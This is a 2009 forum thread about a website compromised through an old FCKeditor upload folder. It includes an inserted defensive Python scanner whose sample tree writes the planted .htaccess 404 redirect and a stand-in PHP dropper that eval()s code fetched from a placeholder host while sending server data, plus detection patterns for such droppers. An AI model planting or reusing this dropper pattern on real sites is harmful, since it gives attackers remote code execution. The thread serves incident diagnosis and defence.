This is a long post, sorry for that, but I took time to write it with (hopefully) enough debug information; I hope somebody will help or at least comment.
I have just found some unwanted files inside my client's website.
I have a hosting account, let's call it main.com
Inside it there's a secondary domain, let's call it secondary.com
(you can reach "secondary" website by secondary.com or by main.com/secondary, but this is just debug info and probably off topic)
Inside secondary.com there's a CMS I wrote; it uses FCKeditor.
This one uses an upload folder for uploaded files, called "userfiles".
Inside secondary.com/userfiles there are directories with .htaccess files in them; the content of these files is something like:
Options -MultiViews
ErrorDocument 404 //userfiles/81580.php
That PHP file is encrypted. I decrypted it: it tries to run code (using eval()) fetched from 3 different domains; the first 2 are already down, but the 3rd is still active.
The 3rd URL is
http://7.xmldata.info/? + a querystring with some private information taken from the $_SERVER variable.
The response from that website is then run with an eval() call.
The response of that malicious server, by now, is only "?>".
Now my question is how those files were put inside my hosting.
I don't know if it's because of a bug in the old version of FCK I'm using (I don't know the exact version, but the copyright header inside the files says "* Copyright (C) 2003-2005 Frederico Caldeira Knabben", so it's at least 3 years old, and I have to update it to a newer version), or because of the "userfiles" directory running with permissions set to "777".
In the second case, perhaps those files were moved into that dir by another account on the same hosting server?
By the way, the hosting is Hostgator.
I have to find the reason for this hack or I'll never know how to clean my space for sure.
My backend pages have a login feature, so nobody can call the FCK upload using the PHP pages that I wrote. But I wonder if somebody may still upload by calling some FCK files directly from the browser or by POST-ing data from another server, and whether that's a bug that was in older (2005) releases but is now fixed. Otherwise, what are the best practices (like using Apache auth on the entire directory to ensure nobody can call FCK files from outside, but I think this isn't used)?
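The two artefacts described in the post (a .htaccess that hands a 404 to a PHP script under the upload tree, and a PHP dropper in "userfiles" that eval()s a remote response) are easy to triage offline once you know what to look for. The scanner below is an added example written for this thread, not code from the original post or from FCKeditor; it builds a constructed sample "userfiles" tree in a temp directory (the file name 81580.php and the 404 directive are taken from the post; the dropper body and the host example.invalid are constructed placeholders) and reports any PHP file under the upload tree, any ErrorDocument pointing at a .php file, and any world-writable (777) subdirectory.

```python
"""Offline triage scan for an upload directory such as FCKeditor's "userfiles".

Flags the artefacts described in the thread:
  * a .htaccess whose ErrorDocument hands a 404 to a PHP script,
  * any PHP file under the upload tree (uploads should never be executable),
    with eval()/remote-fetch/obfuscation indicators as extra labels,
  * world-writable (777) subdirectories.
The sample tree is constructed here; no real site is touched.
"""
import os
import re
import stat
import tempfile

# "ErrorDocument 404 //userfiles/81580.php" and variants
ERRORDOC_RE = re.compile(
    r"^\s*ErrorDocument\s+\d{3}\s+(\S+\.php\S*)", re.IGNORECASE | re.MULTILINE)
# indicators of the eval-what-the-remote-server-returns pattern from the post
EVAL_RE = re.compile(r"\beval\s*\(", re.IGNORECASE)
FETCH_RE = re.compile(
    r"(file_get_contents|curl_exec|fopen|fsockopen)\s*\(|https?://", re.IGNORECASE)
OBFUSCATION_RE = re.compile(
    r"(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.IGNORECASE)
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")


def scan_upload_tree(root):
    """Return sorted (relative_path, finding, detail) tuples for `root`."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            mode = os.stat(full).st_mode
            if mode & stat.S_IWOTH:  # anyone on the box can drop files here
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, "world_writable_dir", oct(stat.S_IMODE(mode))))
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            if name == ".htaccess":
                for m in ERRORDOC_RE.finditer(text):
                    findings.append((rel, "htaccess_errordocument_php", m.group(1)))
            elif name.lower().endswith(SCRIPT_EXTS):
                # a script in an upload tree is a finding on its own;
                # the extra labels tell the analyst what it does
                reasons = ["php_in_upload_dir"]
                if EVAL_RE.search(text):
                    reasons.append("eval")
                if FETCH_RE.search(text):
                    reasons.append("remote_fetch")
                if OBFUSCATION_RE.search(text):
                    reasons.append("obfuscation")
                findings.append((rel, "+".join(reasons), ""))
    return sorted(findings)


def _write(path, content):
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)


def build_sample_and_scan():
    """Build a constructed 'userfiles' tree mirroring the post, then scan it."""
    root = tempfile.mkdtemp(prefix="userfiles_")
    image_dir = os.path.join(root, "image")
    os.makedirs(image_dir)
    os.chmod(image_dir, 0o777)  # the 777 upload dir mentioned in the post
    _write(os.path.join(image_dir, ".htaccess"),
           "Options -MultiViews\nErrorDocument 404 //userfiles/81580.php\n")
    _write(os.path.join(image_dir, "photo.jpg"), "not really a jpeg\n")  # benign
    _write(os.path.join(root, ".htaccess"), "Options -Indexes\n")  # benign
    # constructed stand-in for the decrypted dropper; example.invalid is a placeholder
    _write(os.path.join(root, "81580.php"),
           '<?php eval(file_get_contents("http://example.invalid/?h=" . $_SERVER["HTTP_HOST"])); ?>\n')
    return scan_upload_tree(root)


if __name__ == "__main__":
    for rel, finding, detail in build_sample_and_scan():
        print(f"{finding:30} {rel} {detail}")
```

Run it against a copy of the real userfiles directory by calling scan_upload_tree() on that path; every hit in the "php_in_upload_dir" class is something the upload folder should never contain, regardless of how it got there.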
Fri, 01/09/2009 - 19:21
#1
Re: I got hacked, please help...
Try to run it (without logging in to your CMS) and upload some files to your server. If it works, then you have enabled the connector for everybody; check your config.php file and make sure that only authenticated users can work with it.
IMPORTANT: deleting the test.html file isn't the solution. A hacker won't use it; he will call the connector directly.
But even if he is able to upload files, the default configuration denies the possibility to upload PHP files, so of course you should also take into account a bug in your own CMS, or other scripts that you may have on that server.
Re: I got hacked, please help...
Many thanks.
Actually, the FCKeditor version I'm using is so old that the path was
http://www.website.com/..../editor/filemanager/browser/default/connectors/test.html
It does not list files and folders but... it creates them!
So thanks, that's a good tool and a good tip to test the security of the FCKeditor deployment.
I'll check the documentation about this topic. Thanks again.
Pierpaolo D'Aimmo
http://www.daimmo.it